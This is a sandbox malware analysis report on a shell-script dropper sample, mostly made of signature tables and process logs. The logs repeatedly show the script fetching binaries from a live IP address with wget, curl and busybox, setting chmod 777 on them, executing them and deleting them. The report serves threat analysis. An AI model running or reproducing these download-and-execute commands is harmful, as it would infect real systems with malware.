Malware Analysis Report

2025-05-28 20:52

Sample ID 241021-bvvmdstcmk
Target 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
SHA256 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478

Threat Level: Shows suspicious behavior

The file 84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-21 01:28

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-21 01:28

Reported

2024-10-21 01:30

Platform

debian9-mipsbe-20240418-en

Max time kernel

87s

Max time network

92s

Command Line

[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt N/A
N/A /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw N/A
N/A /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ N/A
N/A /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q N/A
N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK N/A
N/A /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW N/A
N/A /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq N/A
N/A /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh N/A
N/A /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 N/A
N/A /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P N/A
N/A /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT N/A
N/A /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR N/A
N/A /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t N/A
N/A /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW N/A
N/A /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq N/A
N/A /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh N/A
N/A /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 N/A
N/A /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P N/A
N/A /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT N/A
N/A /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR N/A
N/A /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t N/A
N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK N/A
N/A /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt N/A
N/A /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw N/A
N/A /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ N/A
N/A /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /usr/bin/curl N/A
File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /usr/bin/curl N/A
File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /usr/bin/curl N/A
File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /usr/bin/curl N/A
File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /usr/bin/curl N/A
File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /usr/bin/curl N/A
File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /usr/bin/curl N/A
File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /usr/bin/curl N/A
File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /usr/bin/curl N/A
File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /usr/bin/curl N/A
File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /usr/bin/curl N/A
File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /usr/bin/curl N/A
File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /usr/bin/curl N/A
File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /usr/bin/curl N/A
File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /usr/bin/curl N/A
File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /usr/bin/curl N/A
File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /usr/bin/curl N/A
File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /usr/bin/curl N/A
File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /usr/bin/curl N/A
File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /usr/bin/curl N/A
File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /usr/bin/curl N/A
File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /usr/bin/curl N/A
File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /usr/bin/curl N/A
File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /usr/bin/curl N/A
File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /usr/bin/curl N/A
File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /usr/bin/curl N/A
File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /usr/bin/curl N/A
File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /usr/bin/curl N/A

Processes

/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh

[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/chmod

[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/rm

[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/wget

[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/chmod

[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw

[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/rm

[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/wget

[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/chmod

[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ

[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/rm

[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/chmod

[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q

[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/rm

[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/wget

[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/chmod

[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG

[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/rm

[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/wget

[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/chmod

[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK

[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/rm

[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/wget

[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/chmod

[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW

[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/rm

[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/wget

[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/chmod

[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq

[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/rm

[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/wget

[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/chmod

[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh

[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/rm

[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/chmod

[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4

[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/rm

[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/wget

[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/chmod

[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P

[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/rm

[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/wget

[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/chmod

[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT

[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/rm

[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/wget

[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/chmod

[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR

[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/rm

[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/wget

[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/chmod

[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t

[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/rm

[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/wget

[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/chmod

[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW

[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/rm

[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/wget

[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/chmod

[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq

[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/rm

[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/wget

[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/chmod

[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh

[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/rm

[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/chmod

[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4

[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/rm

[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/wget

[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/chmod

[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P

[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/rm

[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/wget

[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/chmod

[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT

[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/rm

[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/wget

[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/chmod

[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR

[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/rm

[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/wget

[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/chmod

[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t

[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/rm

[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/wget

[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/chmod

[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG

[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/rm

[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/wget

[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/chmod

